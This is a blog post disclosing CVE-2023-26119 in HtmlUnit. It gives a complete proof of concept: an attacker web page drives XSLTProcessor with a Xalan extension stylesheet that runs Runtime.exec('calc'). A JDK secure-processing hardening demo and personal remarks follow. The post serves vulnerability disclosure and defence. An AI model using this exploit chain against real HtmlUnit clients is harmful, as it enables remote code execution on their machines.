
CVE-2023-26119: HtmlUnit-RCE | Siebene@ Blog

Versions of the package net.sourceforge.htmlunit:htmlunit from 0 and before 3.0.0 are vulnerable to Remote Code Execution (RCE) via XSLT when browsing the attacker's webpage.

CVE #web #apache #java #rce

HtmlUnit-RCE

2022-12-30 10:10:12 #WEB

「The vulnerability has been reported and is fixed in the latest version. Article updated on 23.1.26」

HtmlUnit is a headless browser for Java. Honestly I don't think it really counts as a headless browser, it's more like a crawler. The latest version can also be made to trigger RCE just by browsing the attacker's webpage.

Putting a quick screenshot here first; I'll fill in the rest later.

It's honestly quite simple, so I won't analyze it. I just happened to take a look that day and found it, though XSLT does seem to be pretty popular lately.

Test.java


package HtmlUnit;

import com.gargoylesoftware.htmlunit.WebClient;
import com.gargoylesoftware.htmlunit.html.HtmlPage;

public class Test {

    public static void main(String[] args) throws Exception {

        // Visiting a page under the attacker's control is the only interaction needed:
        // the page's JavaScript drives HtmlUnit's XSLTProcessor with a hostile stylesheet.
        try (final WebClient webClient = new WebClient()) {
            final HtmlPage page = webClient.getPage("http://xxx/htmlunit.html");
        }
    }

}

htmlunit.html


<script>
// Helpers: build an empty XML document and fetch a file synchronously.
function createXmlDocument() {
return document.implementation.createDocument('', '', null);
}
function loadXMLDocumentFromFile(file) {
xhttp = new XMLHttpRequest();
xhttp.open("GET", file, false);
xhttp.send();
return xhttp.responseXML;
}
console.log("1");

// 1.xml is a trivial input document; 2.xml is the stylesheet carrying the Java extension calls.
var xmlDoc = createXmlDocument();
xmlDoc.async = false;
xmlDoc = loadXMLDocumentFromFile("1.xml");

var xslDoc = createXmlDocument();
xslDoc.async = false;
xslDoc = loadXMLDocumentFromFile("2.xml");

// HtmlUnit backs the XSLTProcessor host object with a Java XSLT engine, so importing
// and applying the stylesheet evaluates its extension functions inside the HtmlUnit JVM.
var processor = new XSLTProcessor();
processor.importStylesheet(xslDoc);
processor.transformToDocument(xmlDoc);

</script>

1.xml


<?xml version="1.0" encoding="UTF-8"?>
<s></s>

2.xml


<!-- The rt: and ob: prefixes use Xalan's Java extension namespaces, which map an XSLT prefix onto a JVM class. -->
<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime" xmlns:ob="http://xml.apache.org/xalan/java/java.lang.Object">
<xsl:template match="/">
<xsl:variable name="rtobject" select="rt:getRuntime()"/>
<xsl:variable name="process" select="rt:exec($rtobject,'calc')"/>
<xsl:variable name="processString" select="ob:toString($process)"/>
<xsl:value-of select="$processString"/>
</xsl:template>
</xsl:stylesheet>
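The whole chain rests on the XSLT engine behind HtmlUnit's XSLTProcessor accepting Xalan-style Java extension namespaces. The standard defence for any Java code that transforms untrusted stylesheets is to enable `XMLConstants.FEATURE_SECURE_PROCESSING` on the `TransformerFactory`, which makes the JDK's built-in XSLTC (and Apache Xalan) refuse extension-function calls at compile time. The following is an added example, not code from the post or from the HtmlUnit project: the class name `XsltHardeningDemo` is made up, the stylesheet is constructed for the demo and uses the same extension-namespace mechanism as the post's 2.xml but only calls `System.getProperty`, and it assumes the JDK's default `TransformerFactory`.

```java
import javax.xml.XMLConstants;
import javax.xml.transform.Transformer;
import javax.xml.transform.TransformerException;
import javax.xml.transform.TransformerFactory;
import javax.xml.transform.stream.StreamResult;
import javax.xml.transform.stream.StreamSource;
import java.io.StringReader;
import java.io.StringWriter;

public class XsltHardeningDemo {

    // Constructed stylesheet: same Xalan Java-extension namespace mechanism as the
    // post's 2.xml, but the only call is a harmless static method on java.lang.System.
    static final String EXTENSION_XSLT =
        "<xsl:stylesheet version=\"1.0\""
        + " xmlns:xsl=\"http://www.w3.org/1999/XSL/Transform\""
        + " xmlns:sys=\"http://xml.apache.org/xalan/java/java.lang.System\">"
        + "<xsl:template match=\"/\">"
        + "<xsl:value-of select=\"sys:getProperty('java.version')\"/>"
        + "</xsl:template></xsl:stylesheet>";

    // Constructed input document, equivalent to the post's 1.xml.
    static final String INPUT_XML = "<?xml version=\"1.0\" encoding=\"UTF-8\"?><s></s>";

    /**
     * Compiles and applies EXTENSION_XSLT with or without secure processing.
     * Returns the transform output; throws when the engine refuses the stylesheet.
     */
    static String transform(boolean secureProcessing) throws TransformerException {
        TransformerFactory factory = TransformerFactory.newInstance();
        // With secure processing on, XSLTC rejects extension functions while compiling
        // the stylesheet, so newTransformer() below throws instead of producing a Transformer.
        factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, secureProcessing);
        Transformer transformer = factory.newTransformer(
            new StreamSource(new StringReader(EXTENSION_XSLT)));
        StringWriter out = new StringWriter();
        transformer.transform(
            new StreamSource(new StringReader(INPUT_XML)), new StreamResult(out));
        return out.toString();
    }

    public static void main(String[] args) {
        // Unhardened factory: the extension call runs and the JVM version is emitted.
        try {
            System.out.println("insecure factory -> " + transform(false));
        } catch (TransformerException e) {
            System.out.println("insecure factory refused: " + e.getMessage());
        }
        // Hardened factory: the identical stylesheet is rejected before anything executes.
        try {
            System.out.println("secure factory -> " + transform(true));
        } catch (TransformerException e) {
            System.out.println("secure factory refused: " + e.getMessage());
        }
    }
}
```

Running it on a stock JDK prints the Java version for the first call and a "not allowed when the secure processing feature is set to true" style refusal for the second. The same flag is what a code review should look for wherever a `TransformerFactory` (or an `XSLTProcessor` wrapper such as HtmlUnit's) is fed stylesheets that originate from a remote page.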

Rambling corner

I'm honestly too lazy normally; unless I'm playing CTF, I basically don't study on my own initiative. I hope to keep this blog properly in the coming year, 2023, to push myself.

The first semester of junior year is basically over, and I've found I haven't reached the level I hoped for; basically every day passes with nothing done. After all, I pretty much didn't go to classes this semester, thinking I'd study technology properly, but I overestimated myself lmao.
